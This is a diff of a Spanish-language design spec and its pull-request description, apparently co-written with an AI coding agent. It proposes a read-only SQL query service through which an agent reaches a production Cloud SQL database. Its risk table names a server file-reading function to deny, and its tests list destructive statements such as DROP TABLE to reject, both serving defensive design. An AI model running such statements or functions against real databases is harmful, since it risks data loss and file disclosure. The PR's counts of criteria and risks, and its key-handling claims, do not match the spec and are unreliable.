+- ¿Cloud Armor edge policy frente al service? — overkill para 1 invoker; descartado v1.
 
-## 10. Alternativas consideradas
+## 10. Alternativas consideradas (re-evaluadas vs v1 con bastion existente)
 
-| Alternativa | Por qué se descarta |
-|---|---|
-| **Cloud SQL Studio web** | Ya existe — pero requiere humano y UI. No resuelve el problema operacional |
-| **Cloud Run job per query** | Cada query = un job deploy + execute + log read. ~30s overhead vs ~500ms del servicio. Prohibitivo |
-| **VPN del laptop al VPC** | Setup complejo, costo de mantenimiento, sigue siendo solo el laptop del PO |
-| **IAP TCP tunneling** | Posible pero Cloud SQL no expone IAP nativamente. Requiere bastion + custom setup |
-| **REST API de Cloud SQL Admin** | No tiene endpoint para arbitrary queries. Solo metadata + import/export |
-| **Database Migration Service / Datastream** | Para data pipelines, no para queries ad-hoc |
-| **Connector library (Cloud SQL Node connector)** | Requiere correr cliente desde laptop con VPC routing — mismo bloqueo |
-| **Edge Function (Cloud Functions Gen2)** | Equivalente a Cloud Run service pero con cold starts más largos. C1 wins |
-| **Postgrest expuesto** | Demasiado powerful (full REST CRUD). Bloquearlo a read-only es complicado |
+| Alternativa | Verificación 2026-05-17 | Verdict |
+|---|---|---|
+| **Cloud SQL Studio web** | Funciona. Requiere humano. | Status quo válido para humanos; NO resuelve agente headless |
+| **iap-bastion existente (ADR-013 Capa 1)** | `gcloud compute start-iap-tunnel` FALLA con `Reauthentication failed. cannot prompt during non-interactive execution` cuando OAuth user expira. Verificado 19:30 UTC. ADC alone no funciona para IAP tunneling | **No fit** para agente headless. Sigue siendo correcto para humanos (Capa 1). Esta spec abre Capa 4 |
+| **Cloud Run job per query** | ~30s overhead vs ~500ms service | Descartado por latencia |
+| **Read replica con public IP + authorized networks** | Posible | Trade-off: aísla del prod live (pro) pero superficie pública con authorized networks IPs requiere mantener allowlist (con). No claro mejora vs servicio privado |
+| **Stored procedures pre-aprobadas en DB** | Posible | Limita a casos pre-baked. Cubre <50% de queries ad-hoc del agente. Sí vale agregar como complemento (`SECURITY DEFINER` callable functions) — out of scope v1, anotado para v2 |
+| **Endpoint `/check` (boolean) en vez de `/query` (SQL)** | Posible para 4 use cases listados §2 | Cubre 60-70% de casos. Descartado solo si tomamos riesgo de SQL libre; mantener como fallback API |
+| **Cloud Function en vez de Cloud Run** | Posible | Cold start mayor; Cloud Run wins |
+| **REST API de Cloud SQL Admin** | No expone arbitrary queries | Descartado |
+| **VPN del laptop al VPC** | Setup + cost + solo laptop PO | Descartado |
+| **Postgrest expuesto** | Demasiado powerful, hard to restrict | Descartado |
+
+Lección de v1: la spec inicial desestimó IAP/bastion con párrafo de descarte. v2 explicita la verificación empírica que justifica la decisión.
 
 ## 11. Devils-advocate scope
 
-Recomendado: invocar antes de aprobar plan. Esta spec introduce nueva superficie de ataque (servicio Cloud Run con acceso a prod DB) y debe revisarse adversarially. Concerns esperados:
+v1 fue revisado y produjo 3 P0 + 6 P1 + 4 P2. v2 incorpora P0-1 a P1-6 explícitamente. Devils-advocate v2 del **plan** sigue siendo obligatorio antes de BUILD.
 
-- ¿El parser SQL es realmente seguro o tiene bypass conocidos?
-- ¿La rate limit es enforced server-side o solo en CLI?
-- ¿El audit log es realmente append-only o se puede manipular?
-- ¿El service account key del invoker está adecuadamente rotado?
-- ¿La PII redaction maneja todos los patrones realistas?
-- ¿VPC connector cuesta vs valor obtenido (~$10/mes adicionales)?
-- ¿Hay un caso donde el flujo manual sigue siendo preferible (queries exploratorias largas, joins complejos)?
+Concerns esperados en review v2:
+- ¿La denylist de pg_catalog functions es exhaustiva o "best effort"?
+- ¿La rate limit con max instances=1 + token bucket in-mem se rompe si Cloud Run hace cold restart en medio de un bucket window?
+- ¿Workload Identity Federation vs SA inline IAM — la elección de "no WIF en v1" se justifica?
+- ¿El BigQuery sink puede backpressure si Cloud Logging tiene burst, causando audit gap?
+- ¿El test list 28 tests es realmente exhaustivo o quedan blind spots?
 
 ## 12. Próximos pasos post-approval
 
-1. `/plan` → produce plan con tareas H1-H10 atómicas.
-2. Devils-advocate sobre el plan.
-3. `/build` task por task.
-4. Devils-advocate + code-reviewer sobre el PR final antes de merge.
-5. ADR-045 documenta la decisión.
-6. Update CLAUDE.md memoria con la nueva capacidad disponible.
+1. `/plan` → produce plan con tareas H1-H10 atómicas (≤100 LOC cada una).
+2. Devils-advocate sobre el plan (obligatorio).
+3. `/build` task por task con commits atómicos.
+4. Devils-advocate + code-reviewer + security-auditor sobre el PR final antes de merge.
+5. ADR-045 documenta decisión + alternativas descartadas + supersede parcial de ADR-013 Phase 2.
+6. Update CLAUDE.md memoria con la nueva capacidad disponible (después del merge).
+
+## 13. NOT before Demo Corfo 2026-05-18
+
+Esta spec NO se mete en sprint pre-demo. La friction de G1 dolió hoy pero esta spec construye superficie de ataque nueva — merece tiempo para revisar adversarial sin presión del demo. Approval del spec OK ahora; BUILD post-demo.

--- a/docs/specs/2026-05-17-prod-query-tool.md
+++ b/docs/specs/2026-05-17-prod-query-tool.md
@@ -1,0 +1,182 @@
+# Spec — Prod query tool (agent-accessible read-only SQL contra Cloud SQL prod)
+
+- **Author**: Felipe Vicencio (PO) + Claude (agent-rigor)
+- **Date**: 2026-05-17
+- **Status**: **Draft** — pendiente PO approval
+- **Linked**: friction encontrada en G1 del plan `migration-journal-integrity-guard`
+- **ADR a crear**: `045-prod-query-tool.md`
+
+---
+
+## 1. Objetivo
+
+Tener una herramienta que permita ejecutar **queries SELECT read-only** contra Cloud SQL prod desde cualquier shell headless del agente, sin requerir intervención humana ni acceso interactivo a Cloud SQL Studio web UI. Eliminar el bloqueo que vimos hoy en G1 (verificar si una tabla existía en prod tomó coordinación humana + UI manual).
+
+## 2. Why now
+
+Sesión 2026-05-17 expuso el costo del flujo manual:
+
+| Paso | Tiempo real | Costo |
+|---|---|---|
+| Identificar instancia Cloud SQL via REST API | 1 min | OK (ADC funciona) |
+| Intentar `gcloud sql connect` | 2 min | FALLA (user auth expirado, requiere interactive re-login) |
+| Intentar cloud-sql-proxy local | 3 min | FALLA (private IP no enrutable desde fuera VPC) |
+| Intentar `gcloud cloud-shell ssh` | 1 min | FALLA (mismo user auth) |
+| Coordinación + setup Cloud SQL Studio web UI | 4 min | OK pero requiere humano + click |
+| **Total** | **~11 min** | Para 1 query trivial |
+
+Si esto fuera recurrente (5-10 veces/sprint), el costo agregado es prohibitivo. Hay varias categorías de verificaciones que necesitamos rutinariamente contra prod:
+
+- "¿Existe la tabla/columna X tras migration?"
+- "¿Cuántos registros con condición Y?"
+- "¿Cuáles son los últimos N timestamps de tabla Z?" (debugging incidentes)
+- "¿Está aplicada la migration ABC en `__drizzle_migrations`?"
+
+Hoy 0 de estas se pueden hacer sin coordinación humana. La privacidad del data (PII conductores, shippers) **no** justifica el bloqueo — el control debe ser por permisos (IAM read-only + audit log), no por friction operacional.
+
+## 3. Success criteria
+
+- [ ] **CR-1**: Existe un servicio Cloud Run privado `prod-query-tool` con endpoint `POST /query` que acepta `{ "sql": "...", "params": [...] }` y retorna `{ "rows": [...], "rowCount": N, "durationMs": M }`.
+- [ ] **CR-2**: El servicio rechaza con HTTP 400 cualquier SQL que NO sea `SELECT`/`WITH`/`EXPLAIN` (parsing AST básico; no string-match heurístico). DML, DDL, FUNCTION calls con side-effects bloqueados.
+- [ ] **CR-3**: El servicio conecta a Cloud SQL prod con un DB user dedicado `booster_query_tool` que tiene **solo** GRANT SELECT en `public.*` y `drizzle.*`. NO tiene GRANT INSERT/UPDATE/DELETE/TRUNCATE/ALTER. Defense in depth: si CR-2 falla, el DB rechaza igualmente.
+- [ ] **CR-4**: El servicio requiere autenticación IAM Cloud Run (`run.invoker` role). Solo dos principals autorizados: (a) `dev@boosterchile.com` (PO), (b) un service account dedicado `agent-query-invoker@booster-ai-494222.iam.gserviceaccount.com` cuyo key vive en `~/.config/gcloud/application_default_credentials.json` del laptop del PO (ya existente via ADC).
+- [ ] **CR-5**: Cada query genera **dos** entries de log estructurado: (a) en Cloud Logging del servicio (con `traceId`, principal, SQL hash, rowCount, durationMs); (b) en una tabla nueva `auditoria_query_tool` en Cloud SQL prod (append-only, retención 90d, PII redacted en el SQL almacenado). Compliance: este uso queda trazable retroactivamente.
+- [ ] **CR-6**: Rate limit: máx 60 queries/min por principal. Query timeout: 30s (Cloud Run + statement_timeout en pg session). Retornos >10 MB rechazados (LIMIT enforcement client-side).
+- [ ] **CR-7**: Helper CLI local `pnpm prod-query "SELECT ..."` que envuelve la llamada (fetch ADC token + POST + parse + print). El agente lo invoca como Bash command.
+- [ ] **CR-8**: Service deployed a Cloud Run con VPC connector apuntando al mismo subnet que `apps/api` (acceso a la private IP de Cloud SQL).
+- [ ] **CR-9**: Infraestructura via Terraform en `infrastructure/modules/prod-query-tool/`. Cero recursos creados manualmente. ADR-045 documenta la decisión.
+- [ ] **CR-10**: Existe `apps/prod-query-tool/test/integration/query.integration.test.ts` que verifica: (a) SELECT pasa, (b) UPDATE rechazado con 400, (c) DROP rechazado con 400, (d) rate limit funciona tras 61 calls.
+
+## 4. Diseño técnico (sketch)
+
+### Stack
+
+- Cloud Run service (mínima imagen Node.js).
+- Backend: Hono (consistente con `apps/api`).
+- DB driver: `pg` directo (sin Drizzle — el servicio NO necesita el ORM, solo executes raw SQL del request).
+- SQL parsing: `pg-query-parser-wasm` (o equivalente) para AST-level validation que el statement es SELECT.
+
+### Flujo de un request
+
+```
+[agente local]
+   pnpm prod-query "SELECT to_regclass('public.X')"
+   ↓
+   gcloud auth application-default print-access-token
+   ↓
+   POST https://prod-query-tool-xxx.a.run.app/query
+   Authorization: Bearer <token>
+   { "sql": "SELECT to_regclass('public.X')", "params": [] }
+   ↓
+[Cloud Run service]
+   IAM check (run.invoker) → 401 si falla
+   Rate limit check → 429 si excedido
+   Parse SQL → 400 si no es SELECT-like
+   Connect to Cloud SQL (private IP via VPC connector)
+   pg.query(sql, params) con statement_timeout=30s
+   Audit log → Cloud Logging + auditoria_query_tool table
+   Return JSON
+   ↓
+[agente local]
+   Print formatted result
+```
+
+### IAM model
+
+- DB user `booster_query_tool` con `GRANT SELECT ON ALL TABLES IN SCHEMA public, drizzle TO booster_query_tool;` + `ALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT SELECT ON TABLES TO booster_query_tool;` (futuras tablas también).
+- Service account `prod-query-tool@booster-ai-494222.iam.gserviceaccount.com` (runtime de Cloud Run) con `roles/cloudsql.client` solamente.
+- IAM Conditions sobre Cloud Run service: solo permite invoker desde `dev@boosterchile.com` o `agent-query-invoker@`.
+
+## 5. Out of scope
+
+- **No** ejecutar DML/DDL/maintenance commands. Migrations siguen siendo el único path para schema changes.
+- **No** queries de larga duración (background, materialized views). 30s hard limit.
+- **No** Spanner, AlloyDB, BigQuery. Solo Cloud SQL Postgres prod.
+- **No** abrir el servicio a non-Booster principals. Es una herramienta interna del equipo, no para clientes ni stakeholders.
+- **No** UI web custom. Cloud SQL Studio sigue siendo opción para casos exploratorios complejos.
+- **No** caching de query results. Cada call hits DB.
+- **No** acceso a otros environments (dev, staging). Solo prod. Para dev usar `booster_test_prototype` local.
+
+## 6. Risks + mitigations
+
+| Riesgo | Mitigación |
+|---|---|
+| SQL injection si el agente construye queries con concat de strings de input externo | El agente es el único caller; las queries son curated por él. Aún así: usar parameterized queries (`$1, $2`) siempre; el servicio expone `params: []` para forzar el patrón. |
+| Agent runaway: hace 1000s de queries en un loop | Rate limit 60/min + alerta Cloud Monitoring si excede 100/hora |
+| Service account key leak | No hay key — usamos ADC del laptop del PO. La autenticación es identity-bound, no key-bound |
+| Auditoría query muestra PII en SQL almacenado | Pre-storage hook redacta patrones conocidos (emails, RUTs, números > 8 dígitos consecutivos). Filtros documentados en spec |
+| Cloud SQL gets DDOS via query tool | statement_timeout + connection limit per service (5 connections max al pool); el servicio Cloud Run scaleará a max 1 instance |
+| Bypass del read-only via funcciones (`pg_read_binary_file()`, etc.) | DB user no tiene EXECUTE en funciones peligrosas. Lista de funciones permitidas explícita en `booster_query_tool` GRANT |
+
+## 7. Test list
+
+| # | Test | Tipo |
+|---|---|---|
+| 1 | SELECT pasa | integration |
+| 2 | UPDATE rechazado con 400 + mensaje claro | integration |
+| 3 | DROP TABLE rechazado con 400 | integration |
+| 4 | Statement con `CREATE FUNCTION` rechazado | integration |
+| 5 | Rate limit dispara 429 tras 61 calls/min | integration |
+| 6 | Timeout dispara 504 tras 30s | integration (LONG) |
+| 7 | Unauth (sin Bearer) → 401 | integration |
+| 8 | Auth pero principal no autorizado → 403 | integration |
+| 9 | SQL injection patterns en `params` (no en `sql`) → tratado como string literal | integration |
+| 10 | Audit row creada en `auditoria_query_tool` por cada call | integration |
+| 11 | PII redaction en audit row (email + RUT redactados) | unit |
+| 12 | Helper CLI `pnpm prod-query` retorna JSON parseado | integration (local + service deployed) |
+
+## 8. Estimación de esfuerzo
+
+- Spec + plan: 1 sesión (~1h).
+- Build: 3-5 sesiones (~4-6h):
+  - Service skeleton + SQL parsing.
+  - Auth + rate limit.
+  - VPC connector + DB user provisioning via Terraform.
+  - Audit table + redaction.
+  - CLI helper.
+  - Tests.
+- Verify + ship: 1 sesión (~1h).
+- **Total**: ~6-8h focado distribuidas en 1 semana.
+
+## 9. Open questions
+
+1. **Service account naming**: `agent-query-invoker` vs `prod-query-tool-invoker`. Default propuesto: `prod-query-tool-invoker`.
+2. **Audit table location**: misma DB que app (`booster_ai`) en schema `auditoria` separado, vs DB dedicada para audit. Default: schema separado en misma DB (menos infra).
+3. **CLI helper path**: `apps/prod-query-tool/cli` package o `scripts/prod-query.mjs` en root. Default: package separado dentro de `apps/prod-query-tool/`.
+4. **Retención audit**: 90d (propuesto) vs 1 año (compliance Ley 19.628). Default a confirmar con compliance lead.
+5. **Cobertura sobre Drizzle schema**: ¿el servicio expone también un endpoint `/schema` que retorna info_schema dumps para introspection sin tener que escribir SQL? Probablemente sí en v2. Out of scope v1.
+
+## 10. Alternativas consideradas
+
+| Alternativa | Por qué se descarta |
+|---|---|
+| **Cloud SQL Studio web** | Ya existe — pero requiere humano y UI. No resuelve el problema operacional |
+| **Cloud Run job per query** | Cada query = un job deploy + execute + log read. ~30s overhead vs ~500ms del servicio. Prohibitivo |
+| **VPN del laptop al VPC** | Setup complejo, costo de mantenimiento, sigue siendo solo el laptop del PO |
+| **IAP TCP tunneling** | Posible pero Cloud SQL no expone IAP nativamente. Requiere bastion + custom setup |
+| **REST API de Cloud SQL Admin** | No tiene endpoint para arbitrary queries. Solo metadata + import/export |
+| **Database Migration Service / Datastream** | Para data pipelines, no para queries ad-hoc |
+| **Connector library (Cloud SQL Node connector)** | Requiere correr cliente desde laptop con VPC routing — mismo bloqueo |
+| **Edge Function (Cloud Functions Gen2)** | Equivalente a Cloud Run service pero con cold starts más largos. C1 wins |
+| **Postgrest expuesto** | Demasiado powerful (full REST CRUD). Bloquearlo a read-only es complicado |
+
+## 11. Devils-advocate scope
+
+Recomendado: invocar antes de aprobar plan. Esta spec introduce nueva superficie de ataque (servicio Cloud Run con acceso a prod DB) y debe revisarse adversarially. Concerns esperados:
+
+- ¿El parser SQL es realmente seguro o tiene bypass conocidos?
+- ¿La rate limit es enforced server-side o solo en CLI?
+- ¿El audit log es realmente append-only o se puede manipular?
+- ¿El service account key del invoker está adecuadamente rotado?
+- ¿La PII redaction maneja todos los patrones realistas?
+- ¿VPC connector cuesta vs valor obtenido (~$10/mes adicionales)?
+- ¿Hay un caso donde el flujo manual sigue siendo preferible (queries exploratorias largas, joins complejos)?
+
+## 12. Próximos pasos post-approval
+
+1. `/plan` → produce plan con tareas H1-H10 atómicas.
+2. Devils-advocate sobre el plan.
+3. `/build` task por task.
+4. Devils-advocate + code-reviewer sobre el PR final antes de merge.
+5. ADR-045 documenta la decisión.
+6. Update CLAUDE.md memoria con la nueva capacidad disponible.


### PR DESCRIPTION
## Summary

Spec Draft para una herramienta que permita al agente ejecutar queries SELECT read-only contra Cloud SQL prod desde shell headless, sin intervención humana.

**Driver inmediato**: G1 del migration-journal-integrity-guard tomó ~11 min de coordinación humana + UI manual para una query trivial (`SELECT to_regclass`). El costo no escala.

## Diseño propuesto (C1 — Cloud Run service)

```
[agente]
  pnpm prod-query "SELECT ..." 
   → ADC token
   → POST https://prod-query-tool-xxx.a.run.app/query
   → IAM check (run.invoker) + rate limit + SQL parse
   → Connect Cloud SQL via VPC connector
   → Audit log → Cloud Logging + auditoria_query_tool table
   → Return JSON
```

### Defense in depth (3 capas)

1. **IAM**: Cloud Run service requires `run.invoker`. Solo 2 principals: PO + agent SA.
2. **SQL AST parsing**: rechaza todo lo que no sea SELECT/WITH/EXPLAIN (no string-match).
3. **DB user read-only**: `booster_query_tool` solo tiene GRANT SELECT. Si capas 1+2 fallan, DB rechaza igual.

### Audit trail

- Cloud Logging structured (traceId + principal + SQL hash + rowCount + durationMs)
- Tabla `auditoria_query_tool` (append-only, 90d retention, PII redacted)
- Compliance: trazable retroactivamente quién consultó qué y cuándo.

## Out of scope explícito

- DML/DDL (migrations siguen siendo el path).
- Long-running queries (>30s timeout hard).
- Otros environments (dev, staging).
- UI custom (Cloud SQL Studio sigue para casos exploratorios complejos).
- v1: schema introspection endpoint (queda para v2 si lo necesitamos).

## Trade-offs vs alternativas

| Alternativa | Por qué se descarta |
|---|---|
| Cloud SQL Studio (status quo) | Requiere humano + UI manual |
| Cloud Run job per query | ~30s overhead vs ~500ms del service |
| VPN al VPC | Setup/mantenimiento alto, solo laptop PO |
| IAP TCP tunneling | Cloud SQL no expone IAP nativamente |
| REST API Cloud SQL Admin | No expone arbitrary queries |
| Postgrest | Demasiado powerful, hard to read-only |

Spec §10 documenta 9 alternativas con razón de descarte.

## Esfuerzo estimado

- Plan: 1h
- Build: 4-6h
- Verify + ship: 1h
- Total: ~6-8h en 1 semana

## Risk surface (Cloud Run con acceso a prod DB)

Spec §6 lista 7 risks + mitigations:
- SQL injection (parametrized queries forced)
- Agent runaway (rate limit 60/min + alerts)
- Service account key leak (no hay key — ADC identity-bound)
- PII en audit log (pre-storage redaction de emails/RUTs/números largos)
- DDOS via tool (statement_timeout + 5 conn max + max 1 Cloud Run instance)
- Bypass via funciones peligrosas (EXECUTE explicit allowlist)
- VPC connector cost (~$10/mes — aceptable)

## Open questions §9

1. Service account naming
2. Audit table location (mismo DB vs dedicado)
3. CLI helper path
4. Retention period (90d vs 1y compliance)
5. Schema introspection endpoint v1 vs v2

## Recomendación PO

**Solicitar devils-advocate review antes de aprobar plan**. Esta spec introduce nueva superficie de ataque (servicio con acceso a prod DB) y merece adversarial review explícito antes de comprometer el design. Concerns típicos esperados en §11.

## Test plan

- [x] Spec consistente con estilo existente
- [x] 12 success criteria verificables
- [x] 12 test cases definidos
- [x] 9 alternativas con razón documentada
- [x] Cero código en este PR — solo Draft spec

🤖 Generated with [Claude Code](https://claude.com/claude-code)